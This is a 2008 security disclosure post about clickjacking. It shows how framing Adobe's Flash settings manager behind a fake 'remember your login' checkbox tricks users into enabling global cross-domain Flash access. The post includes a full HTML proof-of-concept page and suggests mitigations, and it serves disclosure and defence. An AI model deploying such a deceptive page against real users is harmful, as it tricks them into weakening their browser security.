Bypassing NoScript Iframe Protection.
October 5, 2008Payload Control Through Conditional Comments.
October 15, 2008UI redressing or clickjacking has gotten a lot of attention lately, and for a good reason because it's quite malicious. If you thought it stopped at enabling webcam and microphone access, your wrong. The Adobe settings manager which is ironically located at the Macromedia website, allow us to trick someone into enabling cross domain access with the use of an IFRAME. The trick here is is to bypass Adobe's frame busting security by referencing the Flash object instead of the HTML that goes along with it, and triggering the correct tab that allows us to change the global security settings.
Figure 1 shows the the Adobe settings manager located at Macromedia with the triggered tab Global Security Settings which we can pass in the following manner: defaultTab=g_security
The following code provides a quick proof of concept that allows to leverage the same origin policy security in Flash objects globally.
Online proof of concept: http://www.0x000000.com/sop.html
<script>
window.onerror = function() {
return true;
}
</script>
<style>
* {
font-family: verdana;
font-size: 11px;
}
</style>
This is a non-malicious proof of concept based upon clickjacking, this poc leverages all
security settings, which allow cross domain access. Please do notice that once you
checked, your Flash settings will allow for cross domain access! to un-check go to
this page: <a href="sop2.html">undo flash settings</a> credits:
Robert Hansen, Jeremiah Grossman, PDP, rvdh<br /><br />
<fieldset style="width:500px;"><legend>Login please</legend>
<h1>Hello! welcome back!</h1><br /><br />
username: <input type="text"><br />
password: <input type="password"><br /><br />
Do you want to remember your login? please check to allow:
<iframe src="http://www.macromedia.com/support/flashplayer/sys/settingsmanager.swf?defaultTab=g_security" frameborder="0"
scrolling="no" style="width:140px;height:20px;margin:0px;"></iframe><br /><br />
<input type="submit" name="submit" value="Login!" />
</fieldset>
A quick way to mitigate this is using NoScript for Mozilla Firefox, since it has some additional UI redressing prevention measures, or if you are a system administrator you can also block the Macromedia domain and IP in your network to make sure no one is being tricked into leveraging their global application security through flash. Since this seems to only work from the Macromedia domain, it'a highly advised to block Adobe and Macromedia until they found a way to mitigate this problem. The webcam and microphone hack also still works in the same manner, if you switch to the correct tab in the Adobe settings manager.
I disclosed it promptly for everyone to take notice of the UI redressing severity. The UI redressing technique is disclosed already and this method I present here would probably surface any time soon if I didn't discuss it. It is better to be safe than sorry. Thanks to Robert Hansen, Jeremiah Grossman, PDP, Kuza55, and MZ for reviews and feedback and coining the name.
source: OWASP News
